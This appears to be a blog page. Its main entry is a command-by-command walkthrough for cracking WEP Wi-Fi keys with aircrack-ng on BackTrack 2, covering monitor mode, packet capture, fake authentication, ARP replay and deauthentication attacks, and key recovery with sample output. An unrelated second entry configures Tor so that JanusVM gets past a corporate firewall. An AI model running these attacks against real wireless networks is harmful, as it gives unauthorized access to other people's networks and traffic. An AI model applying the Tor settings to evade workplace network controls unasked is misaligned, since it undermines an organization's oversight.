Download the source here.

tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make -B install

make install will throw out some errors, so just do it with a “-B”

-B, –always-make Unconditionally make all targets.

So let’s get started then..Back Track 2 loaded with the rt73 drivers.

The following commands is to get your WUSB54GC dongle into the monitor/injection mode.

“ifconfig rausb0 up”

“iwconfig rausb0 mode monitor channel 1 rate 1M”

“iwpriv rausb0 forceprism 1″

“iwpriv rausb0 rfmontx 1″

I have yet to find out what those iwpriv does other than turning on some private IO controls within the card or drivers.

To verify that your card is ready for injecting, execute “aireplay-ng –test rausb0″

You should see the following:

Trying broadcast probe requests…
Injection is working!
Found 15 APs

Now we are ready, open the first console and execute the following command

“airodump-ng –ivs -w capture –encrypt wep -a rausb0″

and it will return with a list of APs by BSSID, PWR, CH, ESSID and other interesting fields and data dumped to a capture-0x.ivs

Once you have determine your target, you may want to re-run airodump and filter by the BSSID or leave the command running to collect the IVs.

Next, we will execute a series of commands in different consoles together.

The fakeauth attack “aireplay-ng –fakeauth 10 -e MySSID -a 00:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 rausb0″

You should see the following:

Waiting for beacon frame (BSSID: 00:XX:XX:XX:XX:XX)
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful

The ARP replay attack “aireplay-ng –arpreplay -e <ESSID> -b <BSSID> -h 00:11:22:33:44:55 rausb0″

You should see the following:

Saving ARP requests in replay_arp-xxxxx.cap
You should also start airodump-ng to capture replies.
Read 53965 packets (got 31064 ARP requests), sent 48076 packets…(319 pps)

Here’s the part where I don’t get it.

Sometimes you have to run a deauth attack to get some ARP packets coming, sometimes I don’t need to.

aireplay-ng –deauth 10 -e MySSID -a <00:XX:XX:XX:XX:XX> -h 00:11:22:33:44:55 rausb0

Finally after collecting about 100k for 64bit WEP till 500k for 128bit WEP of IV packets, you may execute “aircrack-ng -b 00:XX:XX:XX:XX:XX capture-0x.ivs”

You should see the following:

[00:00:00] Tested 1 keys (got 208713 IVs)

KB depth byte(vote)
0 0/ 1 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

0 0/ 2 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

.

.

0 0/ 5 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

KEY FOUND! [ XX:XX:XX:XX:XX ]
Decrypted correctly: 100%

Basically it provides a layer of security and privacy for most TCP based applications, like IM, web browsing, etc, even DNS requests are passed through Tor. Most importantly, it provides you with access to sites that are filtered off by your ISP transparent proxies.

Tor allows your traffic to be re-route all around the internet anonymously via a complex network of virtual tunnels. An overview of Tor can be found here and a detailed FAQ on Onion Routers here.

My blog entry today is: how to enable your JanusVM to work in a corporate network whereby your firewall blocks most of the outgoing ports except http and https.

You can tell Tor to only use the ports that your firewall permits by adding the following to your torrc configuration file.

FascistFirewall 1

ReachableDirAddresses *:80
ReachableORAddresses *:443

Update:

The latest beta version of Tor uses the following instead of the above

ReachableAddresses *:80